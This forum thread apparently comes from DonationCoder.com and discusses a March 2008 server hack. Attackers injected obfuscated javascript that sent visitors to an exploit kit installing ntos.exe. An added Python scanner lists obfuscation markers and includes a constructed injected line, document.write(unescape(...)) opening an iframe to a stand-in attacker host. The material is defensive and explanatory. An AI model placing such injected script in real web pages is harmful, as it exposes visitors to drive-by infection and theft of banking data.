

Thread about the DonationCoder.com server Shutdown on March 2nd, 2008


mouser:
I'm just going to start this thread now so that it's up, and then i'll add more in the coming days.

NOTE: A separate thread celebrating our coming back online after the outage is here.


Cut+paste of the message that was up on our server for the last 4 days for everyone that tried to access any page on the server:
What happened:

On Sunday morning, March 2nd, around 10:30am(EST), the server was hacked into by someone who used an exploit on a piece of older software to get root access.
Thankfully the attacker was only in the machine for 1-2 hours when the intrusion was discovered, and we immediately locked down access to all services.

There doesn't appear to be any data loss, but the attacker did manage to put up some sort of activex code on the homepage of the site which attempted to infect visitors of our homepage using older versions of Internet Explorer. If you visited the home page of the site on Sunday morning EST using Internet Explorer and noticed anything strange please make sure you run a virus scan on your computer. If the activex is allowed to run, it attempts to install a version of the ntos.exe virus on the users PC. To make sure you have not been infected, please go to the (C:\)Windows\System32\ directory on your PC and look for a file called "ntos.exe". If you do find a Windows\System32\ntos.exe file on your pc, then you need help removing the infection. Here is one page with some instructions. The virus is also detected by the free antivirus programs AVG and AntiVir.

Please note that none of our file downloads were ever compromised in any way.

We have decided that the best thing for us to do in order to be absolutely certain that the attack cannot be repeated is to reinstall new server software from scratch, with tighter security restrictions, and then restore the site content from known good backups.

We can't apologize enough for the downtime and inconvenience. It's heartbreaking to us that someone would do this to the site. The only thing we can do is re-dedicate ourselves to security and take the time to fix it properly so it never happens again.

Thank you for your understanding and patience. And thank you so much for your support while we work to bring the site back up.

-mouser, gothic, wordzilla, and rest of the DC team
--- End quote ---

mouser:
Let me quickly add a few words about the code that the hacker put on the homepage (actually it turns out it was also on a few more index.html pages on the site, like the Reviews/ start page).

We were fortunate to have a few white hat hacker types and some malware professionals take a look at what the code placed on the page was trying to do (thanks everyone on our irc channel -- #donationcoder on efnet).

Basically the code was some obfuscated javascript that simply opened a page on a far away site, which attempted to trigger some exploits in older versions of Internet Explorer.  It looks like it was some version of something called icepack/mpack, which believe it or not is a product that people SELL AND BUY for the explicit purpose of hacking computers.

The code was designed to try various tricks on people who were using Internet Explorer.  I actually tried in a virtual machine to let it infect me and it was a bit difficult since by default, the latter versions of Internet Explorer (v7 and on) have some pretty reasonable steps that try to warn you that something strange is happening and ask you if you want to install activeX components, etc.  But if you had an old version of Internet Explorer you may have been at risk -- please run an antivirus check to be sure.

I cannot tell you how distraught and angry i was when i found out that someone had put this code on our homepage.  I felt like I had let down the visitors to this site.  If i don't seem contrite enough at the moment, it's only because in the last 4 days since the server was down i have gradually calmed down from a state of hyperventilation.  The only thing now to do is go forward and work at making the site more secure.  Thanks to everyone on our IRC channel who put up with me freaking out, and who helped analyze the attack, and especially to DC member Jazper who alerted us about the initial intrusion so quickly that the site wasn't exposed for more than an hour or so.

A few things to note about the code they added to the page that should give you some pause while surfing:

* The only thing they did to the page was add 1 line of javascript.
* That is enough to open a page on another site which can begin delivering you attempted exploit code designed to trick your browser into downloading and installing a virus.
* There is nothing special about it being on our server -- anyone who owns any site could put this code on their page without having to hack anything.
* In other words, the owner of any site on any page you ever visit could put code like this on their page to try to infect you.  It's just plain simple javascript.  No one needs to hack a site to put this code on their own created pages.
* What this means is that you should expect that if you do even a little bit of regular surfing, you need to be aware how important it is to have up-to-date software installed -- keep your browsers updated to latest versions, be on the lookout for announcements about possible security risks, have a good antivirus.
* Listen to your browser -- all new versions of IE and firefox will alert you if a site is trying to open and run some executable or active X.  If you get an unexpected pop-up question on a site asking if you want to run some addon or something, say no unless you know exactly what it's for.
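The injection mouser describes above (a single inline line of obfuscated javascript added to index.html pages) is something a site owner can sweep for in the web root. The following is an added example, not code from DonationCoder or from the thread; the marker strings and the list of "local" hosts are assumptions you would tune for your own site.

```python
import re
from pathlib import Path
from html.parser import HTMLParser

# Strings that, inside a one-line inline script on an otherwise static page,
# are the usual sign of an encoded payload (assumed heuristics, tune per site).
OBFUSCATION_MARKERS = ("unescape(", "eval(", "fromCharCode(", "document.write(")
# Hosts the site is allowed to load scripts/frames from (assumed for the example).
LOCAL_HOSTS = {"donationcoder.com", "www.donationcoder.com"}


class _Scanner(HTMLParser):
    """Flags script/iframe tags that pull from foreign hosts and obfuscated inline scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or ""
        if tag in ("script", "iframe") and src:
            m = re.match(r"https?://([^/:?#]+)", src, re.I)
            if m and m.group(1).lower() not in LOCAL_HOSTS:
                self.findings.append(f"{tag} loads from external host {m.group(1).lower()}")
        # Only a <script> without src has a body worth inspecting.
        self._in_inline_script = tag == "script" and not src

    def handle_data(self, data):
        if self._in_inline_script:
            hits = [mk for mk in OBFUSCATION_MARKERS if mk in data]
            if hits:
                self.findings.append("inline script uses " + ", ".join(hits))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False


def scan_html(text):
    """Return the list of findings for one HTML document (empty means nothing suspicious)."""
    s = _Scanner()
    s.feed(text)
    s.close()
    return s.findings


def scan_webroot(root):
    """Scan every index.html under root; returns {path: findings} for pages with hits."""
    return {str(p): f for p in Path(root).rglob("index.html")
            if (f := scan_html(p.read_text(errors="replace")))}


# Constructed samples: a clean page, and the same page with one injected line.
CLEAN_PAGE = '<html><body><h1>DC</h1><script src="/js/menu.js"></script></body></html>'
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>", "<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//attacker.invalid/%22%3E'))</script></body>")
```

Run `scan_webroot("/path/to/webroot")` from a known-good host after restoring backups; any page it lists should be compared against the backup copy before it goes live.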

f0dder:
It's worth noting that the malware package is designed to do really nasty things, like stealing your banking information - so it's very important that you check whether you've been infected or not. The quick way is checking whether you have a file called ntos.exe in %SystemRoot%\system32, like mouser mentioned above.

The scumbags that do this are obviously interested in getting as many people infected as possible, and while I don't know how many visitors we have per day, my guess is it's a fair amount of people.

This wasn't the typical defacing hack just to say i ownz j00, it was done by people with monetary crime in mind!

mouser:
A couple of good free antivirus tools:

* AVG
* AntiVir
By the way if anyone confirms that they were infected by this from our site (remember that the exploit was only in place for an hour or so on Sunday morning between 9a-11am ) please email me at mouser@donationcoder and let me know.

iphigenie:
Do you know how they got access to the pages in the first place?

When I had the problem 1.5 years ago they gained access to the tinyportal/smf uploads directory (can't remember which) and from this created some folders to put a warez server on. They didn't manage to change the pages, and couldn't do very much (thank goodness for BSD!) but still the bandwidth bill for 36 hours was.... about a year's hosting!

Do I need to worry and go check my site or can I just stay here and post some of the things I wanted to post last weekend?
